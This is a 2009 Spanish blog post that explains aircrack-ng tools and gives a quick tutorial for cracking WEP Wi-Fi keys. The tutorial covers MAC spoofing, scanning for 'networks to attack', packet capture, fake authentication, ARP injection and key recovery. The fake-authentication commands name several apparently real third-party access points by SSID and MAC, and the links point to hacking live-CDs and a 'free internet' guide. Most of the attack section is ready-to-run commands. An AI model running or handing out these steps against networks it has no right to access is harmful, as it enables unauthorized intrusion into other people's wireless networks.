Linux – Escudriñando la WIFI

por | 8 septiembre, 2009

Sólo como ejercicio de red.

Para trabajar con las redes WIFI en Linux tenemos tres tipos  de componentes:

  • Capturadores: airodump-ng (del aircrack), kismet
  • Inyectores de paqutes: aireplay (del aircrack), deauth (programa void11)
  • Desencriptadores: aircrack, airdecap

airodump-ng

Sintaxis: airodump-ng [options] <interface name>

airodump-ng es un capturador de paquetes para porcesarlos con aircrack-ng.

Opciones:

-w cap prefijo del archivo a guardar (si no se pone sólo se muestra por pantalla)

-e guarda todos los beaconbs (anuncios de puntos de acceso) por defecto sólo guarda uno.

-i sólo captura IVs (vectores de inicialización) sólo para descubrir claves

-u <secs> segundos entre actualizaciones del display (útil para ornedores lentos)

–showack muestra estadísticas ACK/CTS/RTS, ayuda en el debugging y en la optimización de la inyección.

Ayuda a detectar estaciones ocultas

-h oculta estaciones encontradas con –showack

–berlin <secs> tiempo antes de eliminar el AP/cliente en pantalla cuando no se reciben más paqutes (def. 120 sec.)

-c <channel> indica los canales en los que escuchar, se pueden poner varios separados por comas

-b <abg> indica la banda (a, b o g) separados por comas

-s <method> define el modo que se configuran los canales (0,1 ó 2) cuando se usa más de una tarjeta

-r <file> lee datos desde un fichero

Hay más opciones de filtrado por pantalla no tratadas aquí.

Ejemplos:

# airodump-ng -w cap -e -i –showack eth1

Nota:

Los archivos se guardan en el directorio home (/root para user root) con los nombres cap-01.cap, cap-02.cap, etc.

aireplay-ng

aireplay-ng inyecta paquetes ARP-request dentro de una red wifi para generar tráfico

Sintaxis: aireplay-ng [options] <replay interface>

Opciones:

-b <bssid> nombre bssid de la red wifi en la que inyectar

-d <dmac> dirección MAC del destino

-s <smac> dirección MAC de origen

-m <len> longitud mínima de paquetes

-n <len> longitud máxima de paquetes

-u <type> trama de control, tipo de campo

-v <subt> trama de control, subtipo de campo

-t <tods> trama de control, bit DS «To»

-f <fromds> trama de control, bit DS «From»

TUTORIAL RAPIDO

1. cambiar nuestra MAC:

# ifconfig eth1 down
# ifconfig eth1 hw ether 00:11:22:33:44:55
# ifconfig eth1 up

2. Ver redes para atacar:

# airodump-ng eth1

Nos fijamos en las redes con mayor potencia (PWR)

3. lanzar captura del canal de la red que queremos atacar:

# airodump-ng eth1 -w [nombre_archivo] -c [canal]
# airodump-ng eth1 -w capturawifi -c 11

4. Inyectar paquetes:

Autenticar contra el AP:

aireplay-ng -1 0 -e [nombre_AP] -a [MAC_AP] -h [MAC_miWIFI] [Mi_Interfaz]

aireplay-ng -1 0 -e WebSTAR2 -a 00:1E:8C:0B:1D:1F -h 00:11:22:33:44:55 eth1
aireplay-ng -1 0 -e WLAN_CE -a 00:13:49:EB:93:3D -h 00-17-3F-71-88-38 rausb0
aireplay-ng -1 0 -e WebSTAR2 -a 00:1E:8C:0B:1D:1F -h 00-17-3F-71-88-38 rausb0
aireplay-ng -1 0 -e Netxan -a 00:14:A5:5F:80:0F -h 00-17-3F-71-88-38 rausb0
aireplay-ng -1 0 -e ALCON -a 00:21:27:EC:82:34 -h 00-17-3F-71-88-38 rausb0
aireplay-ng -1 0 -e MANE -a 00:50:7F:36:15:9D -h 00-17-3F-71-88-38 rausb0
aireplay-ng -1 0 -e Eladio -a 00:11:E3:D4:72:20 -h 00-17-3F-71-88-38 rausb0

Inyectar paquetes:

# airreplay-ng -3 -b [MAC_AP] -h 00:11:22:33:44:55 eth1
# airreplay-ng -3 -b 00:1E:8C:0B:1D:1F –h [MAC_miWIFI] [Mi_Interfaz]

(para desencriptar se necesitan 150.000 paquetes aprox. (columna #Data))

5. Desencriptar las claves

# aircrack-ng capturawifi*.cap

Aparece un listado de redes capturadas, seleccionamos el indice de la red atacada y esperamos el resultados.

 

Algunos enlaces útiles.

LIVE-CDS HACKING

http://download.wifislax.com:8080/wifislax-3.1.iso wifislax
http://www.idg.pl/ftp/linux_941/Troppix.1.2.html Troppix
http://remote-exploit.org/backtrack_download.html BackTrack

TUTORIALES

http://internet-gratis-facil.blogspot.com/
http://www.elhacker.net/hacking-wep-troppix.htm

LISTADOS TARJETAS WIFI

http://linux-wless.passys.nl/
http://hwagm.elhacker.net/htm/tarjetas.htm
http://www.aircrack-ng.org/doku.php?id=compatibility_drivers

 

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *